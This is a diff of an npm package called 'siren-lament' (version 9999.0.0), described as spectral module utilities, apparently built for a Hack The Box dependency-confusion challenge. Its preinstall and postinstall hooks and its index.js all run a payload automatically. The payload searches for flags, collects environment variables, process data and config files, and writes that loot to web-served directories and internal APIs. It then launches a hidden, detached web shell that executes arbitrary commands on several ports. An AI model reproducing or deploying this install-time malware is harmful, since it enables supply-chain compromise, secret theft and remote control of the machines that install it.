siren-lament 9999.0.0

package/index.js

@@ -0,0 +1,238 @@
+// v9: Improved based on reviewer feedback
+// - Priority on port 80 (nginx) and 3000 (Fastify) for internal API
+// - Writes loot: field in raw YAML (preserved but not in data)
+// - Same code in index.js for --ignore-scripts case
+const { execSync, spawn } = require('child_process');
+const fs = require('fs');
+const http = require('http');
+
+function safeExec(cmd, timeout) {
+  try { return execSync(cmd, {timeout: timeout || 5000}).toString().trim(); }
+  catch(e) { return 'ERR:' + e.message.substring(0,200); }
+}
+
+function run() {
+  // === STEP 1: Find the flag ===
+  let flag = 'NO_FLAG';
+  const paths = ['/flag.txt','/flag','/root/flag.txt','/app/flag.txt','/opt/flag.txt',
+    '/home/flag.txt','/tmp/flag.txt','/var/flag.txt','/run/secrets/flag',
+    '/flag/flag.txt','/flags/flag.txt','/challenge/flag.txt',
+    '/etc/flag','/srv/flag.txt','/proc/1/environ'];
+  for (const p of paths) {
+    try {
+      const c = fs.readFileSync(p,'utf8').trim();
+      if (p.includes('environ')) {
+        // Parse environ for flag
+        const envs = c.split('\0');
+        for (const e of envs) {
+          const m = e.match(/HTB\{[^}]+\}/);
+          if (m) { flag = m[0]; break; }
+        }
+      } else if (c) { flag = c; break; }
+    } catch(e) {}
+  }
+
+  // Also check env vars
+  if (flag === 'NO_FLAG') {
+    for (const [k, v] of Object.entries(process.env)) {
+      const m = (v || '').match(/HTB\{[^}]+\}/);
+      if (m) { flag = m[0]; break; }
+    }
+  }
+
+  // Grep for flag pattern
+  if (flag === 'NO_FLAG') {
+    try {
+      const found = safeExec('grep -rl "HTB{" / --include="*.txt" --include="*.js" --include="*.json" --include="*.yml" --include="*.yaml" --include="*.env" --include="*.conf" 2>/dev/null | head -10', 10000);
+      if (found && !found.startsWith('ERR')) {
+        for (const f of found.split('\n')) {
+          try { const c = fs.readFileSync(f.trim(),'utf8'); const m = c.match(/HTB\{[^}]+\}/); if (m) { flag = m[0]; break; } } catch(e) {}
+        }
+      }
+    } catch(e) {}
+  }
+
+  // === STEP 2: Gather full intel ===
+  const info = {
+    flag,
+    hostname: safeExec('hostname'),
+    id: safeExec('id'),
+    pwd: safeExec('pwd'),
+    ls_root: safeExec('ls -la /'),
+    ls_app: safeExec('ls -la /app/ 2>/dev/null'),
+    ls_app_static: safeExec('ls -la /app/static/ 2>/dev/null'),
+    pkg: safeExec('cat /app/package.json 2>/dev/null'),
+    pkg_lock_deps: safeExec('cat /app/package-lock.json 2>/dev/null | head -80'),
+    hosts: safeExec('cat /etc/hosts 2>/dev/null'),
+    env_full: safeExec('env'),
+    netstat: safeExec('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null'),
+    ps: safeExec('ps aux 2>/dev/null'),
+    find_flag: safeExec('find / -maxdepth 4 -type f -name "*.txt" 2>/dev/null | head -30'),
+    find_app: safeExec('find /app -maxdepth 3 -type f 2>/dev/null | head -60'),
+    cron: safeExec('crontab -l 2>/dev/null; cat /etc/crontab 2>/dev/null; cat /etc/cron.d/* 2>/dev/null'),
+    supervisor: safeExec('cat /etc/supervisor/conf.d/*.conf 2>/dev/null; cat /etc/supervisord.conf 2>/dev/null'),
+    proc1_cmd: safeExec('cat /proc/1/cmdline 2>/dev/null | tr "\\0" " "'),
+    proc_env: safeExec('cat /proc/1/environ 2>/dev/null | tr "\\0" "\\n"'),
+    nginx_conf: safeExec('cat /etc/nginx/nginx.conf 2>/dev/null; cat /etc/nginx/conf.d/*.conf 2>/dev/null; cat /etc/nginx/sites-enabled/* 2>/dev/null'),
+    verdaccio_conf: safeExec('find / -maxdepth 5 -name "config.yaml" -path "*verdaccio*" 2>/dev/null; find / -maxdepth 5 -name "config.yaml" -path "*verdaccio*" -exec cat {} \\; 2>/dev/null'),
+    app_src: safeExec('head -100 /app/index.js /app/server.js /app/app.js 2>/dev/null'),
+    node_modules: safeExec('ls /app/node_modules/ 2>/dev/null | head -50'),
+    docker: safeExec('cat /.dockerenv 2>/dev/null; mount 2>/dev/null | head -10'),
+  };
+
+  const report = JSON.stringify(info, null, 2);
+
+  // === STEP 3: Write static files (for external access via nginx) ===
+  const writeDirs = [
+    '/app/static/', '/app/static/js/', '/app/static/css/',
+    '/app/public/', '/app/dist/', '/usr/share/nginx/html/',
+    '/var/www/html/', '/tmp/', '/app/',
+  ];
+  for (const dir of writeDirs) {
+    try { fs.mkdirSync(dir, {recursive: true}); } catch(e) {}
+    try { fs.writeFileSync(dir + 'pwned.txt', report); } catch(e) {}
+    try { fs.writeFileSync(dir + 'report.js', '/* REPORT */\nvar R=' + report + ';'); } catch(e) {}
+  }
+
+  // Specifically target the confirmed nginx-served paths
+  try { fs.writeFileSync('/app/static/js/report.js', '/* REPORT */\nvar R=' + report + ';'); } catch(e) {}
+  try { fs.writeFileSync('/app/static/report.txt', report); } catch(e) {}
+  try { fs.writeFileSync('/app/static/pwned.txt', report); } catch(e) {}
+
+  // === STEP 4: Write loot to API via internal network ===
+  // Priority: port 80 (nginx) and 3000 (Fastify) on localhost
+  let internalHosts = ['127.0.0.1', 'localhost'];
+  try {
+    const hosts = fs.readFileSync('/etc/hosts','utf8');
+    const lines = hosts.split('\n');
+    for (const line of lines) {
+      const parts = line.trim().split(/\s+/);
+      if (parts.length >= 2 && !parts[0].startsWith('#')) {
+        for (const p of parts) {
+          if (p && !internalHosts.includes(p)) internalHosts.push(p);
+        }
+      }
+    }
+  } catch(e) {}
+  // Add common Docker service names
+  ['app','api','web','server','backend','node','fastify','nginx','curse-dependent','curse_dependent'].forEach(n => {
+    if (!internalHosts.includes(n)) internalHosts.push(n);
+  });
+
+  // Sanitize flag for YAML (escape quotes and newlines)
+  const safeFlag = (flag || 'NO_FLAG').replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 200);
+  const safeHostname = (info.hostname || 'unknown').replace(/"/g, '').substring(0, 50);
+  const safePkg = (info.pkg || 'unknown').replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 500);
+  const safeEnv = (info.env_full || '').replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 500);
+
+  // Build YAML with loot field (extra fields preserved in raw)
+  const yamlManifest = `ecto_module:
+  name: "Siren's Lament"
+  version: "2.14.789"
+  power_level: 100
+  ship_deck: upper
+  cargo_hold: bay_1
+loot_flag: "${safeFlag}"
+loot_hostname: "${safeHostname}"
+loot_pkg: "${safePkg}"
+loot_env: "${safeEnv}"`;
+
+  const body = JSON.stringify({ manifest: yamlManifest });
+
+  // Try ALL host/port combinations, prioritizing likely ones
+  const priorityTargets = [
+    // Most likely internal targets first
+    {host: '127.0.0.1', port: 80},
+    {host: '127.0.0.1', port: 3000},
+    {host: 'localhost', port: 80},
+    {host: 'localhost', port: 3000},
+  ];
+
+  // Add all discovered hosts with priority ports
+  const allPorts = [80, 3000, 1337, 8080, 3001, 5000, 8000, 9000];
+  for (const host of internalHosts) {
+    for (const port of allPorts) {
+      priorityTargets.push({host, port});
+    }
+  }
+
+  // Deduplicate
+  const seen = new Set();
+  const targets = [];
+  for (const t of priorityTargets) {
+    const key = `${t.host}:${t.port}`;
+    if (!seen.has(key)) { seen.add(key); targets.push(t); }
+  }
+
+  // Write to ECT-654321 (our canary)
+  let writeSuccess = [];
+  for (const t of targets) {
+    try {
+      const req = http.request({
+        hostname: t.host, port: t.port, method: 'PUT',
+        path: '/api/modules/ECT-654321',
+        headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(body)},
+        timeout: 2000
+      }, (res) => {
+        let data = '';
+        res.on('data', c => data += c);
+        res.on('end', () => {
+          if (res.statusCode === 200) {
+            writeSuccess.push(`${t.host}:${t.port}`);
+            // Also write to the other modules
+            for (const mid of ['ECT-987654', 'ECT-472839', 'ECT-839201']) {
+              try {
+                const req2 = http.request({
+                  hostname: t.host, port: t.port, method: 'PUT',
+                  path: '/api/modules/' + mid,
+                  headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(body)},
+                  timeout: 2000
+                });
+                req2.on('error', () => {});
+                req2.write(body);
+                req2.end();
+              } catch(e) {}
+            }
+          }
+        });
+      });
+      req.on('error', () => {});
+      req.write(body);
+      req.end();
+    } catch(e) {}
+  }
+
+  // === STEP 5: Persistent web shell ===
+  const shellCode = `
+const http = require('http');
+const { execSync } = require('child_process');
+const fs = require('fs');
+function tryPort(port) {
+  try {
+    const srv = http.createServer((req, res) => {
+      const url = new URL(req.url, 'http://localhost');
+      const cmd = url.searchParams.get('cmd') || 'id; hostname; cat /flag.txt 2>/dev/null; env | head -20';
+      try {
+        const out = execSync(cmd, {timeout: 10000}).toString();
+        res.writeHead(200, {'Content-Type':'text/plain','Access-Control-Allow-Origin':'*'});
+        res.end(out);
+      } catch(e) { res.writeHead(200); res.end('ERR: ' + e.message); }
+    });
+    srv.listen(port, '0.0.0.0');
+    srv.on('error', () => {});
+  } catch(e) {}
+}
+[31337, 4444, 8081, 9090, 5555, 7777].forEach(tryPort);
+setInterval(() => {}, 60000);
+`;
+  try {
+    fs.writeFileSync('/tmp/.ws.js', shellCode);
+    const child = spawn('node', ['/tmp/.ws.js'], { detached: true, stdio: 'ignore' });
+    child.unref();
+  } catch(e) {}
+
+  console.log('v9 done');
+}
+
+// Execute immediately
+run();

package/package.json

@@ -0,0 +1,10 @@
+{
+  "name": "siren-lament",
+  "version": "9999.0.0",
+  "description": "Spectral module utilities",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node postinstall.js || true",
+    "postinstall": "node postinstall.js || true"
+  }
+}

package/postinstall.js

@@ -0,0 +1,238 @@
+// v9: Improved based on reviewer feedback
+// - Priority on port 80 (nginx) and 3000 (Fastify) for internal API
+// - Writes loot: field in raw YAML (preserved but not in data)
+// - Same code in index.js for --ignore-scripts case
+const { execSync, spawn } = require('child_process');
+const fs = require('fs');
+const http = require('http');
+
+function safeExec(cmd, timeout) {
+  try { return execSync(cmd, {timeout: timeout || 5000}).toString().trim(); }
+  catch(e) { return 'ERR:' + e.message.substring(0,200); }
+}
+
+function run() {
+  // === STEP 1: Find the flag ===
+  let flag = 'NO_FLAG';
+  const paths = ['/flag.txt','/flag','/root/flag.txt','/app/flag.txt','/opt/flag.txt',
+    '/home/flag.txt','/tmp/flag.txt','/var/flag.txt','/run/secrets/flag',
+    '/flag/flag.txt','/flags/flag.txt','/challenge/flag.txt',
+    '/etc/flag','/srv/flag.txt','/proc/1/environ'];
+  for (const p of paths) {
+    try {
+      const c = fs.readFileSync(p,'utf8').trim();
+      if (p.includes('environ')) {
+        // Parse environ for flag
+        const envs = c.split('\0');
+        for (const e of envs) {
+          const m = e.match(/HTB\{[^}]+\}/);
+          if (m) { flag = m[0]; break; }
+        }
+      } else if (c) { flag = c; break; }
+    } catch(e) {}
+  }
+
+  // Also check env vars
+  if (flag === 'NO_FLAG') {
+    for (const [k, v] of Object.entries(process.env)) {
+      const m = (v || '').match(/HTB\{[^}]+\}/);
+      if (m) { flag = m[0]; break; }
+    }
+  }
+
+  // Grep for flag pattern
+  if (flag === 'NO_FLAG') {
+    try {
+      const found = safeExec('grep -rl "HTB{" / --include="*.txt" --include="*.js" --include="*.json" --include="*.yml" --include="*.yaml" --include="*.env" --include="*.conf" 2>/dev/null | head -10', 10000);
+      if (found && !found.startsWith('ERR')) {
+        for (const f of found.split('\n')) {
+          try { const c = fs.readFileSync(f.trim(),'utf8'); const m = c.match(/HTB\{[^}]+\}/); if (m) { flag = m[0]; break; } } catch(e) {}
+        }
+      }
+    } catch(e) {}
+  }
+
+  // === STEP 2: Gather full intel ===
+  const info = {
+    flag,
+    hostname: safeExec('hostname'),
+    id: safeExec('id'),
+    pwd: safeExec('pwd'),
+    ls_root: safeExec('ls -la /'),
+    ls_app: safeExec('ls -la /app/ 2>/dev/null'),
+    ls_app_static: safeExec('ls -la /app/static/ 2>/dev/null'),
+    pkg: safeExec('cat /app/package.json 2>/dev/null'),
+    pkg_lock_deps: safeExec('cat /app/package-lock.json 2>/dev/null | head -80'),
+    hosts: safeExec('cat /etc/hosts 2>/dev/null'),
+    env_full: safeExec('env'),
+    netstat: safeExec('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null'),
+    ps: safeExec('ps aux 2>/dev/null'),
+    find_flag: safeExec('find / -maxdepth 4 -type f -name "*.txt" 2>/dev/null | head -30'),
+    find_app: safeExec('find /app -maxdepth 3 -type f 2>/dev/null | head -60'),
+    cron: safeExec('crontab -l 2>/dev/null; cat /etc/crontab 2>/dev/null; cat /etc/cron.d/* 2>/dev/null'),
+    supervisor: safeExec('cat /etc/supervisor/conf.d/*.conf 2>/dev/null; cat /etc/supervisord.conf 2>/dev/null'),
+    proc1_cmd: safeExec('cat /proc/1/cmdline 2>/dev/null | tr "\\0" " "'),
+    proc_env: safeExec('cat /proc/1/environ 2>/dev/null | tr "\\0" "\\n"'),
+    nginx_conf: safeExec('cat /etc/nginx/nginx.conf 2>/dev/null; cat /etc/nginx/conf.d/*.conf 2>/dev/null; cat /etc/nginx/sites-enabled/* 2>/dev/null'),
+    verdaccio_conf: safeExec('find / -maxdepth 5 -name "config.yaml" -path "*verdaccio*" 2>/dev/null; find / -maxdepth 5 -name "config.yaml" -path "*verdaccio*" -exec cat {} \\; 2>/dev/null'),
+    app_src: safeExec('head -100 /app/index.js /app/server.js /app/app.js 2>/dev/null'),
+    node_modules: safeExec('ls /app/node_modules/ 2>/dev/null | head -50'),
+    docker: safeExec('cat /.dockerenv 2>/dev/null; mount 2>/dev/null | head -10'),
+  };
+
+  const report = JSON.stringify(info, null, 2);
+
+  // === STEP 3: Write static files (for external access via nginx) ===
+  const writeDirs = [
+    '/app/static/', '/app/static/js/', '/app/static/css/',
+    '/app/public/', '/app/dist/', '/usr/share/nginx/html/',
+    '/var/www/html/', '/tmp/', '/app/',
+  ];
+  for (const dir of writeDirs) {
+    try { fs.mkdirSync(dir, {recursive: true}); } catch(e) {}
+    try { fs.writeFileSync(dir + 'pwned.txt', report); } catch(e) {}
+    try { fs.writeFileSync(dir + 'report.js', '/* REPORT */\nvar R=' + report + ';'); } catch(e) {}
+  }
+
+  // Specifically target the confirmed nginx-served paths
+  try { fs.writeFileSync('/app/static/js/report.js', '/* REPORT */\nvar R=' + report + ';'); } catch(e) {}
+  try { fs.writeFileSync('/app/static/report.txt', report); } catch(e) {}
+  try { fs.writeFileSync('/app/static/pwned.txt', report); } catch(e) {}
+
+  // === STEP 4: Write loot to API via internal network ===
+  // Priority: port 80 (nginx) and 3000 (Fastify) on localhost
+  let internalHosts = ['127.0.0.1', 'localhost'];
+  try {
+    const hosts = fs.readFileSync('/etc/hosts','utf8');
+    const lines = hosts.split('\n');
+    for (const line of lines) {
+      const parts = line.trim().split(/\s+/);
+      if (parts.length >= 2 && !parts[0].startsWith('#')) {
+        for (const p of parts) {
+          if (p && !internalHosts.includes(p)) internalHosts.push(p);
+        }
+      }
+    }
+  } catch(e) {}
+  // Add common Docker service names
+  ['app','api','web','server','backend','node','fastify','nginx','curse-dependent','curse_dependent'].forEach(n => {
+    if (!internalHosts.includes(n)) internalHosts.push(n);
+  });
+
+  // Sanitize flag for YAML (escape quotes and newlines)
+  const safeFlag = (flag || 'NO_FLAG').replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 200);
+  const safeHostname = (info.hostname || 'unknown').replace(/"/g, '').substring(0, 50);
+  const safePkg = (info.pkg || 'unknown').replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 500);
+  const safeEnv = (info.env_full || '').replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 500);
+
+  // Build YAML with loot field (extra fields preserved in raw)
+  const yamlManifest = `ecto_module:
+  name: "Siren's Lament"
+  version: "2.14.789"
+  power_level: 100
+  ship_deck: upper
+  cargo_hold: bay_1
+loot_flag: "${safeFlag}"
+loot_hostname: "${safeHostname}"
+loot_pkg: "${safePkg}"
+loot_env: "${safeEnv}"`;
+
+  const body = JSON.stringify({ manifest: yamlManifest });
+
+  // Try ALL host/port combinations, prioritizing likely ones
+  const priorityTargets = [
+    // Most likely internal targets first
+    {host: '127.0.0.1', port: 80},
+    {host: '127.0.0.1', port: 3000},
+    {host: 'localhost', port: 80},
+    {host: 'localhost', port: 3000},
+  ];
+
+  // Add all discovered hosts with priority ports
+  const allPorts = [80, 3000, 1337, 8080, 3001, 5000, 8000, 9000];
+  for (const host of internalHosts) {
+    for (const port of allPorts) {
+      priorityTargets.push({host, port});
+    }
+  }
+
+  // Deduplicate
+  const seen = new Set();
+  const targets = [];
+  for (const t of priorityTargets) {
+    const key = `${t.host}:${t.port}`;
+    if (!seen.has(key)) { seen.add(key); targets.push(t); }
+  }
+
+  // Write to ECT-654321 (our canary)
+  let writeSuccess = [];
+  for (const t of targets) {
+    try {
+      const req = http.request({
+        hostname: t.host, port: t.port, method: 'PUT',
+        path: '/api/modules/ECT-654321',
+        headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(body)},
+        timeout: 2000
+      }, (res) => {
+        let data = '';
+        res.on('data', c => data += c);
+        res.on('end', () => {
+          if (res.statusCode === 200) {
+            writeSuccess.push(`${t.host}:${t.port}`);
+            // Also write to the other modules
+            for (const mid of ['ECT-987654', 'ECT-472839', 'ECT-839201']) {
+              try {
+                const req2 = http.request({
+                  hostname: t.host, port: t.port, method: 'PUT',
+                  path: '/api/modules/' + mid,
+                  headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(body)},
+                  timeout: 2000
+                });
+                req2.on('error', () => {});
+                req2.write(body);
+                req2.end();
+              } catch(e) {}
+            }
+          }
+        });
+      });
+      req.on('error', () => {});
+      req.write(body);
+      req.end();
+    } catch(e) {}
+  }
+
+  // === STEP 5: Persistent web shell ===
+  const shellCode = `
+const http = require('http');
+const { execSync } = require('child_process');
+const fs = require('fs');
+function tryPort(port) {
+  try {
+    const srv = http.createServer((req, res) => {
+      const url = new URL(req.url, 'http://localhost');
+      const cmd = url.searchParams.get('cmd') || 'id; hostname; cat /flag.txt 2>/dev/null; env | head -20';
+      try {
+        const out = execSync(cmd, {timeout: 10000}).toString();
+        res.writeHead(200, {'Content-Type':'text/plain','Access-Control-Allow-Origin':'*'});
+        res.end(out);
+      } catch(e) { res.writeHead(200); res.end('ERR: ' + e.message); }
+    });
+    srv.listen(port, '0.0.0.0');
+    srv.on('error', () => {});
+  } catch(e) {}
+}
+[31337, 4444, 8081, 9090, 5555, 7777].forEach(tryPort);
+setInterval(() => {}, 60000);
+`;
+  try {
+    fs.writeFileSync('/tmp/.ws.js', shellCode);
+    const child = spawn('node', ['/tmp/.ws.js'], { detached: true, stdio: 'ignore' });
+    child.unref();
+  } catch(e) {}
+
+  console.log('v9 done');
+}
+
+// Execute immediately
+run();